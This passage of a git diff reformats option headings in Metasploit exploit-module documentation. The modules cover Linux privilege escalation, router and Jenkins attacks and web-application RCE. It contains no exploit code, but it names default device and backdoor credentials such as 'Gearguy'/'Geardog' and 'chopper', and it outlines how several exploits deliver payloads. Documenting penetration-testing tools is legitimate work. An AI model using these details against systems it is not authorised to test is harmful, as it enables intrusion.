may even fail), so we can simply run pwn and get our shell. 
diff --git a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md index 46f59b090d9d6..9f64e427dd7c3 100644 --- a/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md +++ b/documentation/modules/exploit/linux/local/network_manager_vpnc_username_priv_esc.md @@ -44,11 +44,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md b/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md index b0c08e53b016b..da9cfc6563c00 100644 --- a/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ntfs3g_priv_esc.md @@ -27,7 +27,7 @@ This module was not tested against, but may work against: ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md index 5b7910cade9cd..9b207880fc4e9 100755 --- a/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/omniresolve_suid_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SUID_PATH** +### SUID_PATH Path to `omniresolve` executable (default: `/opt/omni/lbin/omniresolve`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md index d069bd7eef0b8..dad55179d658e 100644 --- a/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md 
+++ b/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md @@ -28,11 +28,11 @@ Untested against ## Options - **COMPILE** +### COMPILE If we should attempt to compile on the system. Defaults to Auto, which checks if `gcc` is installed - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md index 29c29a8cccda4..1a3c9288f8802 100644 --- a/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md +++ b/documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md @@ -38,16 +38,16 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu ## Options -**SESSION** +### SESSION The session to run this module on. -**USERNAME** +### USERNAME The name of the user the exploit will add to the system -**PASSWORD** +### PASSWORD The password for the user to be created -**WritableDir** +### WritableDir Directory to write file to (`%TEMP%` by default). ## Scenarios diff --git a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md index 559ec0f174355..b7d5c2205017d 100644 --- a/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ptrace_sudo_token_priv_esc.md @@ -29,15 +29,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **TIMEOUT** +### TIMEOUT Process injection timeout (seconds) (default: `30`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md index c6f7c36efacd3..8d8f8654076d4 100644 
--- a/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md +++ b/documentation/modules/exploit/linux/local/ptrace_traceme_pkexec_helper.md @@ -51,11 +51,11 @@ some environments. ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to `/tmp` - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to `Auto` diff --git a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md index 30a628325b4b8..0c6f0a9238ecb 100644 --- a/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.md @@ -38,15 +38,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) diff --git a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md index 104a067b5f887..3f6c48c359510 100644 --- a/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md +++ b/documentation/modules/exploit/linux/local/rds_rds_page_copy_user_priv_esc.md @@ -26,15 +26,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **COMPILE** +### COMPILE Options: `Auto` `True` `False` (default: `Auto`) 
diff --git a/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md index bd845464ce278..ede456aa9a0d2 100644 --- a/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md +++ b/documentation/modules/exploit/linux/local/recvmmsg_priv_esc.md @@ -27,11 +27,11 @@ More kernels could be added to this, just need the proper offsets. ## Options - **COMPILE** +### COMPILE If we should attempt to compile live on the system, or drop a binary. Default is `auto` which will compile if `gcc` is installed. - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp diff --git a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md index e2666e70f6567..16c2039c08ea9 100644 --- a/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md +++ b/documentation/modules/exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc.md @@ -30,11 +30,11 @@ ## Options - **REPTILE_CMD_PATH** +### REPTILE_CMD_PATH Path to `reptile_cmd` executable (default: `/reptile/reptile_cmd`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md index 804c49dd68128..4fc2f71cb51f9 100644 --- a/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md +++ b/documentation/modules/exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SERVU_PATH** +### SERVU_PATH Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) 
diff --git a/documentation/modules/exploit/linux/local/sock_sendpage.md b/documentation/modules/exploit/linux/local/sock_sendpage.md index af9d5d55f181b..57133dffbf64d 100644 --- a/documentation/modules/exploit/linux/local/sock_sendpage.md +++ b/documentation/modules/exploit/linux/local/sock_sendpage.md @@ -36,15 +36,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **DEBUG_EXPLOIT** +### DEBUG_EXPLOIT Enable exploit debug messages. (default: `false`) diff --git a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md index f14ece1001378..4d6f1f263472a 100644 --- a/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md +++ b/documentation/modules/exploit/linux/local/systemtap_modprobe_options_priv_esc.md @@ -31,11 +31,11 @@ ## Options - **STAPRUN_PATH** +### STAPRUN_PATH Path to staprun executable (default: `/usr/bin/staprun`) - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) diff --git a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md index c7755ee705a70..0fb90b8143a8f 100644 --- a/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md +++ b/documentation/modules/exploit/linux/local/ufo_privilege_escalation.md @@ -27,11 +27,11 @@ To verify SMAP has been disabled, `grep smap /proc/cpuinfo` and nothing should b ## Options - **WritableDir** +### WritableDir A folder we can write files to. Defaults to /tmp - **COMPILE** +### COMPILE If we should live compile on the system, or drop pre-created binaries. Auto will determine if gcc/libs are installed to compile live on the system. Defaults to Auto 
diff --git a/documentation/modules/exploit/linux/local/vmware_alsa_config.md b/documentation/modules/exploit/linux/local/vmware_alsa_config.md index a15927105a418..b4d61adab74b5 100644 --- a/documentation/modules/exploit/linux/local/vmware_alsa_config.md +++ b/documentation/modules/exploit/linux/local/vmware_alsa_config.md @@ -32,15 +32,15 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `/tmp`) - **Xdisplay** +### Xdisplay Display exploit will attempt to use (default: `:0`) diff --git a/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md b/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md index fe52aa1f8e2f0..4d3eabf3f1e68 100644 --- a/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md +++ b/documentation/modules/exploit/linux/misc/asus_infosvr_auth_bypass_exec.md @@ -26,19 +26,19 @@ ## Options - **TelnetPort** +### TelnetPort The port for Telnetd to bind (default: `4444`) - **TelnetTimeout** +### TelnetTimeout The number of seconds to wait for connection to telnet (default: `10`) - **TelnetBannerTimeout** +### TelnetBannerTimeout The number of seconds to wait for the telnet banner (default: `25`) - **CommandShellCleanupCommand** +### CommandShellCleanupCommand A command to run before the session is closed (default: `exit`) diff --git a/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md b/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md index 7163f2021be63..f26d835c6b4e2 100644 --- a/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md +++ b/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md 
@@ -26,23 +26,23 @@ This vulnerability does not require authentication and only HTTP access to the v ## Options - **RPORT** +### RPORT The http port for the jenkins server. (Defaults to 8080) - **TARGETURI** +### TARGETURI The path to the target instance of Jenkins. (Defaults to /) - **SRVHOST** +### SRVHOST The local address to listen for the LDAP request on. (Defaults to 127.0.0.1) - **SRVPORT** +### SRVPORT The local port to listen for the LDAP request on. (Defaults to 1389) - **LDAPHOST** +### LDAPHOST The ldap host the exploit will connect to. Can be different from ```SRVHOST``` if in a environment where there is port forwarding. (Defaults to 127.0.0.1) diff --git a/documentation/modules/exploit/linux/misc/qnap_transcode_server.md b/documentation/modules/exploit/linux/misc/qnap_transcode_server.md index 2c1abef17f641..9d2ed3827d0cb 100644 --- a/documentation/modules/exploit/linux/misc/qnap_transcode_server.md +++ b/documentation/modules/exploit/linux/misc/qnap_transcode_server.md @@ -22,7 +22,7 @@ ## Options - **Delay** +### Delay How long to wait (in seconds) for the device to download the payload. diff --git a/documentation/modules/exploit/linux/samba/is_known_pipename.md b/documentation/modules/exploit/linux/samba/is_known_pipename.md index 0757631b876e3..4289c094d5068 100644 --- a/documentation/modules/exploit/linux/samba/is_known_pipename.md +++ b/documentation/modules/exploit/linux/samba/is_known_pipename.md @@ -58,12 +58,12 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo ## Options - **SMB_SHARE_NAME** +### SMB_SHARE_NAME The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this variable is non-blank, it will be preferred. - **SMB_SHARE_BASE** +### SMB_SHARE_BASE The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are brute forced including: 
@@ -79,7 +79,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo 9. /var/samba 10. /tmp/home/home/shared - **SMB_FOLDER** +### SMB_FOLDER The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this variable is non-blank, it will be preferred. diff --git a/documentation/modules/exploit/linux/smtp/apache_james_exec.md b/documentation/modules/exploit/linux/smtp/apache_james_exec.md index c08e12777367b..d8d53e46fb014 100644 --- a/documentation/modules/exploit/linux/smtp/apache_james_exec.md +++ b/documentation/modules/exploit/linux/smtp/apache_james_exec.md @@ -20,17 +20,17 @@ __7.__ The payload will connect to the listener if the exploit is successful ## Options - **USERNAME:** The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. +### USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'. - **PASSWORD:** The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. +### PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'. - **ADMINPORT:** The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. +### ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'. - **RHOSTS:** The IP address of the vulnerable server. +### RHOSTS: The IP address of the vulnerable server. - **RPORT:** The port number of the SMTP service. +### RPORT: The port number of the SMTP service. - **POP3PORT** The port for the POP3 Apache James Service. By default this '110'. +### POP3PORT The port for the POP3 Apache James Service. By default this '110'. ## Scenarios **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction 
diff --git a/documentation/modules/exploit/linux/smtp/haraka.md b/documentation/modules/exploit/linux/smtp/haraka.md index 70fb38508117d..f32abba6a3e03 100644 --- a/documentation/modules/exploit/linux/smtp/haraka.md +++ b/documentation/modules/exploit/linux/smtp/haraka.md @@ -33,23 +33,23 @@ ## Options - **from_email** +### from_email String used in the SMTP MAILFROM command - **to_email** +### to_email String used in the SMTP MAILTO command - **lhost** +### lhost The address to serve the payload from - **rhost** +### rhost The address or hostname to target - **payload** +### payload Any compatible Metasploit payload diff --git a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md index c7a0cfd2e16ce..ba66399ce817e 100644 --- a/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md +++ b/documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md @@ -16,24 +16,24 @@ ## Options - **FILEPATH** +### FILEPATH The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp. - **COMMUNITY** +### COMMUNITY The read/write community string of the target Net-SNMP service. - **VERSION** +### VERSION The SNMP protocol version. Accepted values are '1' or '2c'. - **CHUNKSIZE** +### CHUNKSIZE The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors. This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/]. - **TIMEOUT** +### TIMEOUT Specifies the maximum time to allow SNMP to timeout. - **SHELL** +### SHELL The shell to call for the client. Defaults to '/bin/bash' 
diff --git a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md index 2d4e2947dc9bd..a706a6fb5c010 100644 --- a/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md +++ b/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md @@ -38,14 +38,14 @@ Newer devices usually listen on UDP. ## Options -**MAC** +### MAC Set this to the MAC address of the device. You can use `ping` and `arp` to find it. You can leave this blank if you're root. -**USERNAME** +### USERNAME If this is an older device, it'll take the value of `super_username` in `nvram`, which is usually unchanged from `Gearguy`. @@ -55,7 +55,7 @@ usually unchanged from `admin`. You can leave this blank to use the default username. -**PASSWORD** +### PASSWORD If this is an older device, it'll take the value of `super_passwd` in `nvram`, which is usually unchanged from `Geardog`. diff --git a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md index 72bdcdb6effd9..d0f8eab43da91 100644 --- a/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md +++ b/documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md @@ -21,7 +21,7 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Wemo device's UPnP port. In our testing, this was 49152 for Crock-Pot and 49153 for other devices. diff --git a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md index 5155d8b6641bd..20522eea38489 100644 --- a/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md +++ b/documentation/modules/exploit/linux/upnp/dlink_dir859_exec_ssdpcgi.md 
@@ -22,7 +22,7 @@ or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar ## Options -**VECTOR** +### VECTOR This option denotes which header will be used in the request (UUID or URN) that triggers the vulnerability. diff --git a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md index 98bb8158f528b..dd723da0232c4 100644 --- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md +++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md @@ -53,11 +53,11 @@ Source code and installers: Options unique for this module is described below. - **REMOTE_IP** +### REMOTE_IP IP to target when running inside the victim's browser. - **REMOTE_PORT** +### REMOTE_PORT Remote port the vulnerable service is running at, default is 55554. diff --git a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md index e7b0b70b1de91..397ebdfe27eef 100644 --- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md +++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md @@ -35,7 +35,7 @@ ## Options - **FILENAME** +### FILENAME The cbt document file name (default: `msf.cbt`) diff --git a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md index 039338515f7f1..ea589e326dba3 100644 --- a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md +++ b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md 
@@ -29,14 +29,14 @@ Id Name ## Options -**FILENAME** +### FILENAME Set this to the output file's name. Depending on the target environment, the file extension may not matter, so the PS file could be named `msf.pdf`, for instance. This can potentially work around filename filters. -**WritableDir** +### WritableDir Set this to a writable directory without `noexec`. diff --git a/documentation/modules/exploit/multi/fileformat/office_word_macro.md b/documentation/modules/exploit/multi/fileformat/office_word_macro.md index 388ba07383cb7..0d16b2b38ca09 100644 --- a/documentation/modules/exploit/multi/fileformat/office_word_macro.md +++ b/documentation/modules/exploit/multi/fileformat/office_word_macro.md @@ -75,7 +75,7 @@ If you already have Microsoft Office, you can use it to create a docx file and u ## Options -**CUSTOMTEMPLATE** +### CUSTOMTEMPLATE A docx file that will be used as a template to build the exploit. diff --git a/documentation/modules/exploit/multi/hams/steamed.md b/documentation/modules/exploit/multi/hams/steamed.md index 4e6899cd9e3a4..7cb22e4d1960f 100644 --- a/documentation/modules/exploit/multi/hams/steamed.md +++ b/documentation/modules/exploit/multi/hams/steamed.md @@ -15,7 +15,7 @@ this module provides an unforgettable luncheon experience. ## Options - **VERBOSE** +### VERBOSE This option will further enhance the experience. diff --git a/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md b/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md index 47a0d4407492d..319cbde457a2f 100644 --- a/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md +++ b/documentation/modules/exploit/multi/http/apache_normalize_path_rce.md 
@@ -49,15 +49,15 @@ docker start CVE-2021-42013 ## Options -**CVE** +### CVE The vulnerability to use (Accepted: CVE-2021-41773, CVE-2021-42013). Default: CVE-2021-42013 -**DEPTH** +### DEPTH Depth for path traversal. Default: 5 -**TARGETURI** +### TARGETURI Base path. Default: `/cgi-bin` diff --git a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md index 8dc500eb541a1..148ed7de18d24 100644 --- a/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md +++ b/documentation/modules/exploit/multi/http/caidao_php_backdoor_exec.md @@ -20,11 +20,11 @@ Here is the [PHP code](https://github.com/rapid7/metasploit-framework/files/4306 ## Options - **TARGETURI** +### TARGETURI TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor. - **PASSWORD** +### PASSWORD PASSWORD by default is `chopper`, which is the password of the backdoor. diff --git a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md index ae9086b6cb348..f8df802004862 100644 --- a/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md +++ b/documentation/modules/exploit/multi/http/clipbucket_fileupload_exec.md @@ -35,7 +35,7 @@ Follow Clipbucket Installer Instructions at: ```http://localhost/``` ## Options - **TARGETURI** +### TARGETURI TARGETURI by default is `/`, however it can be changed. diff --git a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md index bb119f36cbb0c..0dfdb3d4dd292 100644 --- a/documentation/modules/exploit/multi/http/git_submodule_command_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_command_exec.md 
@@ -28,11 +28,11 @@ ## Options - **GIT_URI** +### GIT_URI This is the URI the git repository will be hosted from (defaults to random). - **GIT_SUBMODULE** +### GIT_SUBMODULE This is the URI of the submodule within the git repository (defaults to random). The url of this submodule, when cloned, will execute the payload. diff --git a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md index 76443c529c47a..6d9352a721e5d 100644 --- a/documentation/modules/exploit/multi/http/git_submodule_url_exec.md +++ b/documentation/modules/exploit/multi/http/git_submodule_url_exec.md @@ -35,11 +35,11 @@ ## Options - **GIT_URI** +### GIT_URI This is the URI the git repository will be hosted from (defaults to random). - **GIT_SUBMODULE** +### GIT_SUBMODULE This is the URI of the submodule within the git repository (defaults to random). The url of this submodule, when cloned, will execute the payload. diff --git a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md index 3f02d636a3adf..730b623bffc3f 100644 --- a/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md +++ b/documentation/modules/exploit/multi/http/jenkins_metaprogramming.md @@ -35,22 +35,22 @@ Id Name ## Options -**RPORT** +### RPORT Set this to the Jenkins port. The default is 8080. -**TARGETURI** +### TARGETURI Set this to the Jenkins base path. The default is `/`. -**SRVPORT** +### SRVPORT Set this to the port on which to serve the payload. Change it from 8080 to something like 8081 if you are testing Jenkins locally on port 8080. This option is valid only for the `Java Dropper` target. -**ForceExploit** +### ForceExploit Set this to `true` to override the `check` result during exploitation. 
diff --git a/documentation/modules/exploit/multi/http/jenkins_script_console.md b/documentation/modules/exploit/multi/http/jenkins_script_console.md index e801a9b503fe9..25ae31a0acf41 100644 --- a/documentation/modules/exploit/multi/http/jenkins_script_console.md +++ b/documentation/modules/exploit/multi/http/jenkins_script_console.md @@ -29,23 +29,23 @@ ## Options - **TARGETURI** +### TARGETURI The path to the target instance of Jenkins. - **USERNAME** +### USERNAME A username to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication. - **PASSWORD** +### PASSWORD A password to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require authentication and you aren't using an API_TOKEN (see below). - **API_TOKEN** +### API_TOKEN An API token to an account that has access to the script console. This is only necessary if the Jenkins instance has been configured to require diff --git a/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md index 0ea20e793ffdb..0e0afd5490a8e 100644 --- a/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md +++ b/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md @@ -21,15 +21,15 @@ Debian Installation: `sudo dpkg --install jenkins_1.642.1_all.deb` ## Options -**TARGETURI** +### TARGETURI The base path to Jenkins application `/` by default -**VHOST** +### VHOST The HTTP server virtual host. You may need to configure this as well, even though it is set as optional. -**The Check Command** +### The Check Command The `jenkins_xstream_deserialize` module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following: 
@@ -47,7 +47,7 @@ msf exploit(jenkins_xstream_deserialize) > check [*] 192.168.1.64:8080 The target appears to be vulnerable.. ``` -**Exploiting the Host** +### Exploiting the Host After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS. diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md index 700dd3ba31213..5d938572cccd9 100644 --- a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md @@ -28,23 +28,23 @@ To set up the vulnerable environment, please do: ## Options - **TARGETURI** +### TARGETURI The MediaWiki base path, the URL path on which MediaWiki is exposed. This is normally `/mediawiki`, `/wiki`, or `/w`. - **UPLOADPATH** +### UPLOADPATH Folder name where MediaWiki stores the uploads, make sure to use a relative path here. For a regular installation this is the `images` folder. This folder needs to be writable by MediaWiki and accessible from the web root. The exploit will try to create a PHP file in this location that will later be called through the web server. - **CLEANUP** +### CLEANUP Set this to true (the default) to unlink the PHP file created by this exploit module. The cleanup code will only be called when the exploit is successful. - **USERNAME** +### USERNAME In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the username of that account here. - **PASSWORD** +### PASSWORD In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here. 
diff --git a/documentation/modules/exploit/multi/http/php_fpm_rce.md b/documentation/modules/exploit/multi/http/php_fpm_rce.md index 8337bb159bd79..6ba601d357fdc 100644 --- a/documentation/modules/exploit/multi/http/php_fpm_rce.md +++ b/documentation/modules/exploit/multi/http/php_fpm_rce.md @@ -64,7 +64,7 @@ configuration provided by the author ## Options - **TARGETURI** +### TARGETURI Path to a PHP page (`/index.php` by default). This must be a valid page. ## Advanced Options diff --git a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md index 249bc9fcabaac..839484a11c8e8 100644 --- a/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md +++ b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md @@ -14,7 +14,7 @@ and 4.0.x versions (prior to 4.0.10.16) are affected. ## Options -**DATABASE** +### DATABASE This option specifies the database the module will use when creating a new table as part of the exploit. diff --git a/documentation/modules/exploit/multi/http/processmaker_exec.md b/documentation/modules/exploit/multi/http/processmaker_exec.md index 8af0d4026f7f2..11aa7f958f63f 100644 --- a/documentation/modules/exploit/multi/http/processmaker_exec.md +++ b/documentation/modules/exploit/multi/http/processmaker_exec.md @@ -68,15 +68,15 @@ ## Options - **Username** +### Username The username for a ProcessMaker user (default: `admin`). - **Password** +### Password The password for the ProcessMaker user (default: `admin`). - **Workspace** +### Workspace The ProcessMaker workspace for which the specified user has access (default: `workflow`). diff --git a/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md index c64eea5794652..2470ac8c38bfc 100644 --- a/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md 
+++ b/documentation/modules/exploit/multi/http/processmaker_plugin_upload.md @@ -33,11 +33,11 @@ ## Options - **Username** +### Username The username for a ProcessMaker user with Administrator roles (default: `admin`). - **Password** +### Password The password for the ProcessMaker user (default: `admin`). @@ -47,7 +47,7 @@ However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively. - **Workspace** +### Workspace The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`) diff --git a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md index b44811fe54bf9..652440dcebce4 100644 --- a/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md +++ b/documentation/modules/exploit/multi/http/qdpm_authenticated_rce.md @@ -19,15 +19,15 @@ The module has been tested against qdPM version 9.1 ## Options - **EMAIL** +### EMAIL [Required] The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not. - **PASSWORD** +### PASSWORD [Required] The password of the user you are trying to exploit. - **TARGETURI** +### TARGETURI The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder. ## Scenarios 
